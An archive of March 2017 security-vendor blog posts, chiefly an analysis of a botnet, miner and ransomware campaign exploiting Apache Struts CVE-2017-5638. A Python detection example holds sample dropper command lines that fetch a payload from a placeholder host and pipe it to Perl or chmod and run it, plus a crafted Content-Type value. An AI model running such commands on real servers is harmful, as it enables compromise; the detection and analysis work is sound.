Monthly Archives: March 2017

Example architectures for data security and the GDPR

Category : HP Security

The European Union (EU) General Data Protection Regulation (GDPR) is the most significant development in data privacy in decades. Its aim is to protect EU citizens from privacy and data breaches. The regulation comes into effect on 25 May 2018 and imposes heavy fines—up to 4% of annual revenue—on organizations for noncompliance.

While the GDPR mandates a number of measures to protect EU citizen data such as data portability, consent and revocation, age verification, and the right to be forgotten, achieving compliance in large measure comes down to good data security.

The GDPR recommends pseudonymization and encryption as two mechanisms that can be used to protect personally identifiable information (PII). Vast amounts of information exist on what data needs to be protected, though there is very little public knowledge about how an organization can deploy technologies and processes to secure this data.

This paper introduces typical business use cases for applying pseudonymization and encryption, provides an overview of the HPE SecureData core technologies and platform, and then describes architectures and strategies adopted by two of HPE’s customers to secure PII data:

• A large European mobile operator that uses the HPE data protection technologies to protect mobile subscriber information in a Hadoop data lake

• A global card brand and card issuer that leverages data protection to secure data as it is migrated to the cloud and uses the same architecture to protect sensitive customer PII data within its on-premises environment

SteelHead CX Completes Common Criteria Certification

Category : Riverbed

It’s been close to a year, but we finally did it!

Riverbed’s SteelHead CX was awarded Common Criteria certification! Specifically, the SteelHead platform has been certified at Evaluation Assurance Level Two Augmented with Flaw Remediation (EAL2+).

What is Common Criteria?

Briefly, it’s an international standard designed to build trust in the security of IT systems. It was originally developed by the governments of Canada, France, Germany, Netherlands, UK, and U.S. The main purpose was to support companies selling technology to government markets and infrastructure providers across the globe to have their products evaluated against one standard and avoid re-evaluation across international markets.

This is big! Why?

Well, for one, when a company claims adherence to a universal set of standards in IT security, such requirements provide the customer confidence in making informed security decisions.

We all know security continues to become increasingly challenging as a result of today’s innovations in cloud computing and collaboration. These capabilities offer many operational efficiencies, but they also create additional risks to the network. Many nations have collaborated to provide assurance of a basic level of security for networking equipment. The Common Criteria certification serves this purpose.

Additionally, you, as a customer, can rely on this certification since SteelHead has been tested by an independent lab and not performed by us, the vendor. In addition, along with the available SteelHead Security Technical Implementation Guide (STIG) and FIPS140-2 certification, this enables customers, including the Defense Information Systems Agency (DISA) and the Department of Defense (DOD), to purchase and deploy SteelHead CX, as it validates the product’s quality assurance, functionality, and security levels.

To learn more about Common Criteria and how it can benefit your organization, navigate to Certified Products to download SteelHead’s certification report.

Reactive Isn’t Working

Category : McAfee

This video featuring Dr. Stephenson, Technology Editor, SC Magazine, and Chris Cardran, Enterprise Technology Architect, Intel Security, explores how threat intelligence sharing and crowdsourcing can strengthen defenses and minimize impacts from zero day vulnerabilities by applying diversity in analysis, context and situational awareness to detect and correct threats.

FireEye & Belden: Protecting ICS with Enterprise and Industrial Security

Category : FireEye

Industrial Control Systems are increasingly open to attacks as the industrial internet of things grows and more systems are exposed to open networks. FireEye and Belden are working together to help mitigate the impact of attacks against critical infrastructures around the globe.

SWIFT Security Concerns Resurface

Category : Cyber-Ark

The Bangladesh Bank heist has resurfaced as reports around a potential perpetrator make headlines. The recent focus may be on who and why, but lessons should be learned from what happened – it’s important to recognize common attack patterns and understand the role of privileged accounts.

As a recap: last year, cyber criminals embezzled money from the Bangladesh Central Bank. Using stolen privileged credentials, they moved laterally throughout the environment until they reached SWIFT, a financial services co-op that provides a secure network through which banks can send and receive monetary transactions. Using these privileged credentials, the criminals ultimately ordered a total of 35 transactions worth $951 million through the SWIFTNet systems. From there, approximately $81 million was transferred before a spelling error raised suspicion that led to the discovery of the breach. (Watch a short video for a brief overview of the attack path.) This was a high-profile attack, but, as noted in a Reuters article, Bangladesh Bank was not the only bank affected.

Lessons learned from the breach and how you can protect your organization:

  • SWIFT Vulnerabilities: Many industry experts have pointed out vulnerabilities in SWIFT, noting that the system has likely not seen its last “bank robbery.” In this CSO article, Lavi Lazarovitz, CyberArk Labs cyber research team leader, explains that attackers are “getting really good at gaining that all important initial foothold inside networks by using attacks such as spear phishing.” With that foothold, they can gain local administrator privileges using, for example, an exploited Acrobat Reader vulnerability; when a user simply opens a malicious PDF file, the file runs malicious code that in turn acquires those elevated privileges.
  • Best Practices to Shore up Privileged Account Security: The Bangladesh Bank attack is yet another example of how attackers covet, seek out and exploit privileged accounts to achieve their mission. While this attack had a serious outcome and required advanced planning, the attack methods used were not very sophisticated. In a post-mortem analysis of the attack, CyberArk security researcher Asaf Hecht outlines five best practices that would have likely mitigated the breach.
  • How Banks Mitigate Risk: The threat is real and present. Many major banks recognize this and have taken steps to prioritize privilege in the wake of this breach. This American Banker article describes how a $26.9 billion-asset bank uses CyberArk to lock down privileged accounts and monitor and analyze privileged account activity.

Want to learn more? Attend a webcast on March 28, 2017 at 2 pm ET. CyberArk Labs will address the cyber security lessons learned related to the heist. Register here.

Instant Desktop Computing, From the New Samsung Galaxy S8 Smartphone

Category : Citrix

Today, at Galaxy UNPACKED 2017 at Lincoln Center in New York, Samsung launched the Galaxy S8 smartphone. It’s big news that’s spreading fast across social media.

So, you might ask, what’s the big deal in the eyes of Citrix?

Citrix runs on any device—desktop, laptop, Chromebook, thin client, tablet, smartphone—so everyone expects the S8 will be another one of the 1,000+ Citrix Ready endpoints to choose from.

What’s not expected is another part of their big unveiling today…

Samsung announced the Desktop Experience (DeX), which enables the S8 to operate as a full-functioning Windows desktop. Just pop the phone into a new Samsung DeX docking station, connect a monitor, keyboard, and mouse… and you have a powerful desktop computer.

And not just any desktop computer—your desktop.

How? With secure access to all your business applications and data to be productive from any work location using your dual-purpose S8. I’m not talking about running lightweight, rudimentary apps that allow you to “get by” during an unplanned work-from-home day. I’m talking resource-intensive, graphically rich, enterprise-grade apps—2D and 3D apps that likely would be impossible to run on computers purchased even just a few years ago.

There’s Only One Way To Do This

The only way to use applications on a smartphone that are designed to run on a computer is through desktop virtualization (VDI), which means the apps are installed and run in a datacenter or trusted cloud and securely accessed remotely by workers. And the only way to ensure that this remoting experience looks and feels like a native desktop—across long distances and varying network conditions—is to use Citrix Workspace products and services.

That’s why Citrix is Samsung’s preferred partner for delivering a next-generation mobile workspace experience through DeX. Our market-leading technologies—XenApp, XenDesktop, XenMobile, ShareFile and NetScaler—power secure mobile workspaces and the future of work.

Together, Citrix and Samsung can deliver a next-generation mobile desktop experience that has the potential to disrupt the market and better support today’s modern workstyles.

Fewer computers for businesses to purchase and refresh. A more secure, yet flexible, computing environment for admins to manage. Fewer devices for workers to tote around.

And THAT is a big deal.

Effective Security for Today’s Threats

Category : Cisco

Security that’s effective, automated and integrated.

Intrusion detection and prevention remains a powerful defense strategy – and Cisco is recognized as a Leader by Gartner. Security innovation, integration with our Advanced Malware Protection (AMP) and the Cisco network and strong customer support let Cisco NGIPS deliver the effective, automated, and integrated security customers need against the latest threats. Download the latest Gartner Magic Quadrant for IDPS.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Cisco.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

From DDoS to Server Ransomware: APACHE STRUTS 2 – CVE-2017-5638 Campaign

Category : F5

A common infection vector used by botnet creators is scanning the Internet for web vulnerabilities to exploit for malware or back doors. The advantage of hitting servers over personal consumer devices is the ability to leverage powerful hardware that is always online and has high bandwidth. Also, many servers do not have anti-virus solutions in place.

As soon as a zero-day remote code execution vulnerability is disclosed, it is common to see many scans in the wild. Some of these scans are researchers, but many of them are hostile exploit attempts. Following the disclosure of the “Jakarta Multipart Parser” vulnerability in APACHE STRUTS 2 (CVE-2017-5638), F5 researchers observed around 10 different campaigns in the wild. One in particular caught our eye.

This campaign started on the 10th of March, 2017, a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit.

Figure 1: CVE-2017-5638 campaign

The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.

In the first days of this campaign, shell commands were observed to infect the machine with the “PowerBot” malware, which is written in PERL, and uses DDoS as its main functionality (also known as the PerlBot or Shellbot).

The typical infection tactic for the most commonly observed threat actors, who scan the Internet for web vulnerabilities as their attack strategy, has been to execute commands in several steps: downloading the malware from a remote server, setting it as executable (in the case of binary file), running the malware, and removing the initial infection file.

Conventionally, attack payloads have relied on programs already installed on the target server, such as wget and curl, to download the malware. In this campaign, the attacker also leverages the less common “fetch” program as well as a special mode of “wget”. With the “wget -qO -” options, the malware file is downloaded but is never written to a file on disk. Instead, the content is redirected to the Perl interpreter for execution, minimizing the detectable footprint on the host.
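As an added, defender-side example (not code from the F5 write-up or from the campaign), the following Python snippet turns the two indicators described above into detection logic run over constructed sample events: a Content-Type header that is not a well-formed media type or carries an expression-language marker, and a process command line that either pipes a download straight into an interpreter or follows the download, chmod, run, delete chain. The sample events, addresses and file names are constructed for illustration.

```python
import re

# Media type grammar from RFC 7231 section 3.1.1.1: type "/" subtype *( OWS ";" OWS parameter ).
# A Content-Type that the parser would have to interpret as anything else is already suspicious.
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
_QUOTED = r'"(?:[^"\\]|\\.)*"'
_PARAM = _TOKEN + "=(?:" + _TOKEN + "|" + _QUOTED + ")"
MEDIA_TYPE_RE = re.compile("^" + _TOKEN + "/" + _TOKEN + r"(?:\s*;\s*" + _PARAM + r")*\s*$")

# Expression-language openers that never belong in a media type value.
OGNL_MARKERS = ("%{", "${")

# Command-line heuristics for the infection tactics described in the article.
PIPE_TO_INTERP_RE = re.compile(
    r"\b(?:wget|curl|fetch)\b[^|;&]*\|\s*(?:perl|bash|sh|python[0-9.]*|php)\b")
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|fetch)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
RM_RE = re.compile(r"\brm\s+-[A-Za-z]*f")


def content_type_finding(value):
    """Return a reason string if the Content-Type value looks hostile, else None."""
    if any(marker in value for marker in OGNL_MARKERS):
        return "expression-language marker in Content-Type"
    if not MEDIA_TYPE_RE.match(value):
        return "Content-Type is not a well-formed media type"
    return None


def command_finding(cmdline):
    """Return a reason string if an executed command line matches a known dropper pattern."""
    if PIPE_TO_INTERP_RE.search(cmdline):
        return "download piped straight into an interpreter (no file on disk)"
    if DOWNLOAD_RE.search(cmdline) and CHMOD_RE.search(cmdline) and RM_RE.search(cmdline):
        return "download, chmod, run, delete chain"
    return None


def scan_events(events):
    """Apply both detectors; return (event index, reason) for every hit."""
    findings = []
    for index, event in enumerate(events):
        if event["type"] == "http":
            reason = content_type_finding(event["content_type"])
        else:
            reason = command_finding(event["cmdline"])
        if reason:
            findings.append((index, reason))
    return findings


# Constructed sample events (not real captures); 198.51.100.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"type": "http", "content_type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"},
    {"type": "http", "content_type": "%{(#_='multipart/form-data').(#CONSTRUCTED=1)}"},
    {"type": "http", "content_type": "application/x-www-form-urlencoded"},
    {"type": "exec", "cmdline": "/bin/sh -c wget -qO - http://198.51.100.7/.mailer | perl"},
    {"type": "exec", "cmdline": "/bin/sh -c cd /tmp; curl -O http://198.51.100.7/a; chmod +x a; ./a; rm -f a"},
    {"type": "exec", "cmdline": "/usr/bin/wget -q https://example.org/index.html -O /tmp/index.html"},
]

if __name__ == "__main__":
    for index, reason in scan_events(SAMPLE_EVENTS):
        print(f"event {index}: {reason}")
```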

Once the bot is in place, the infected server will connect to an IRC channel to retrieve commands from the botnet master, as shown in Figures 2 and 3. While joining the IRC, F5 researchers observed that the botnet has more than 2,500 victims at the time of this writing, including production servers. And this number is just for a single IRC channel.

Figure 2: IRC channel consisting of more than 2,500 bots phoning home

By randomly exploring some of the names and IP addresses of the infected hosts connected to the channel, we could find production servers and servers hosted on the AWS infrastructure.

Figure 3: Example of infected machines connected to the IRC channel

From DDoS to Crypto Currency Mining

Several days after the beginning of the observed campaign, F5 researchers started seeing a variation of the same campaign. The payload switched from Perl to Bash scripting, but this turned out to be just a spearhead to deploy two different types of malware. The spearhead exploit downloads and executes the same PERL bot.

Figure 4: Downloading and running PERL bot

However, this time, a “minerd” crypto coin mining program is downloaded as well, with all of its prerequisites. The attacker masquerades the malicious process and its configuration under names similar to the Apache server’s, so that they look innocent when the infected user lists the running processes.

Figure 5: Downloading “minerd” and its configuration

The bot will then mine coins into several legitimate crypto pools, as shown in the configuration file in Figure 6.

Figure 6: “minerd” configuration file

These cryptocoin pools appear to be hosted in France under the “” domain name, as shown in Figure 7.

Figure 7: Mining host in France in the Online SAS network

One of the more fascinating aspects of this malware was the creative technique that the spearhead exploit uses to propagate itself. It will search for all the remote IP addresses that the administrator of the server was connecting to on this server. It searches the SSH “known_hosts” file, which keeps the IP addresses and fingerprints of all the servers to which the administrator was connecting. It also scans the Bash history file for any IP addresses used within the SSH command. Once this list of IP addresses is compiled, the script tries to connect to them via SSH. If the configured authentication was set up to use a key file instead of a username and password, the malware will successfully deploy itself on the remote machine.

Figure 8: Malware propagating to other known servers

The ShellShock Connection

In general, threat actors love new zero-days as an opportunity to recycle their campaigns. One of the IP addresses in this campaign originates from Hong Kong, as shown in Figure 9; this address was known before to use the notorious ShellShock (CVE-2014-6271) to deliver similar payloads.

Figure 9: Attacking host in Hong Kong on the Wharf T&T network.

F5 researchers noted that the malware file names have stayed the same – “.mailer” and “a” – as shown in Figures 10 and 11. However, the crypto mining pool and the account have been changed, as shown in Figure 12.

Figure 10: ShellShock exploit delivers “.mail” PERL PowerBot
Figure 11: ShellShock exploit delivers “a” spearhead bash script
Figure 12: Crypto currency miner configuration

Expanding to Server Ransomware

Delivering Linux DDoS malware by exploiting web vulnerabilities is commonly observed in the wild, and server ransomware seems to be one of the emerging trends starting from the last year.

The same attacker (surprisingly using the same IP address) behind the previously described Apache STRUTS campaign varied the campaign again during the week of March 20th. This time, the payload infected Windows machines with the “Cerber” ransomware.

The structure of the Jakarta Multipart parser exploit is identical to the attack that was used to deliver previous payloads. However, the current executed shell commands run the Windows BITSAdmin and ftp command line tools (which ship with every Windows server) to download and run the file “1.exe”, as shown in Figure 13.

Figure 13: APACHE STRUTS exploit delivering Windows ransomware

Once running, the malware encrypts the files and shows an image with a ransom message, as shown in Figure 14.

Figure 14: Ransom message once infected

As per the usual ransomware methods, the victim is given instructions on how to pay the ransom to get their files back, as shown in Figure 15.

Figure 15: Ransom payout instructions

F5 researchers analyzed this malware variant and found that the author added functionality to modify Windows firewall rules so that installed anti-virus software is blocked from communicating with the outside world, preventing updates and reporting. The specific rules are shown in Figure 16.

Figure 16: Ransomware blocks Windows Defender

To find the installed security products, the malware first runs WMI queries on the “AntiSpywareProduct” and “FirewallProduct” classes.

Figure 17: WMI queries to get the list of installed security products

Then it traverses the files and folders resulting from the query and adds them to a firewall rule if they are executables.

Figure 18: Adding firewall rules to block security products communication

The Attackers’ Payday

The attackers running this campaign are using the same Bitcoin ID for a number of campaigns.

Figure 19: Bitcoin account located in malware configuration

This particular account has processed 84 bitcoins, which translates to roughly $86,000 USD at current market value (bitcoin value fluctuates slightly day to day). Since the Struts exploit has become publicly available, we observed 2.2 bitcoins going in and out of this wallet, worth roughly $2,300 USD.

Figure 20: Bitcoin transactions for the malware account

Last Word

As we have seen in the past, it is amazing how fast existing threat actors using older web vulnerabilities in their campaigns can adapt to switch to newly released zero-days to deliver the same payloads. This gives them a new vulnerability window to exploit while the defenders install patches.

The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers. Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.

In this article we have analyzed only a single campaign targeting Apache STRUTS. There are around 10 additional ones, most of which are reconnaissance, while others deliver traditional Linux DDoS malware.

Demo of WhatsApp Web Account Takeover

Category : Check Point

A vulnerability has been discovered in WhatsApp Web. This vulnerability, if exploited, would allow attackers to completely take over users’ accounts on any browser, and access victims’ personal and group conversations, photos, videos and other shared files, contact lists, and more. This means that attackers could potentially download photos and/or post them online, send messages on the victim’s behalf, demand ransom, and even take over the victim’s friends’ accounts.

The exploitation of this vulnerability starts with the attacker sending an innocent-looking file containing malicious code to the victim. The file can be modified to contain attractive content and raise the chances that a user will open it. Once the user clicks to open it, the malicious file allows the attacker to access WhatsApp’s local storage, where user data is stored. From that point, the attacker can gain full access to the user’s account and account data. The attacker can then send the malicious file to all of the victim’s contacts, opening a dangerous door to a potentially widespread attack over the WhatsApp network.

Secure Access Solutions for Mobile, Cloud, and Internet of Things

Category : Pulse Secure

Tuesday, April 11, 2017 | 8:00-9:00am PST / 11:00-12:00pm EST

Embrace the latest cloud, mobile and IoT technologies with Secure Access. Learn how Pulse Secure’s latest features and capabilities make it simple to securely roll out new end-user services to support the latest IT transformation without compromising security compliance or taxing your IT team.

Last year we delivered over 250 new product features. Learn about the latest features in:

  • Connect Secure 8.3r1
  • Policy Secure 5.4r1
  • Pulse Client 5.3r1

All are now available in Pulse Access Suite which makes planning, purchasing and deploying a snap. We’ve assembled our product owners to tell you what’s new, so be sure to join and drill down with the experts.

Register now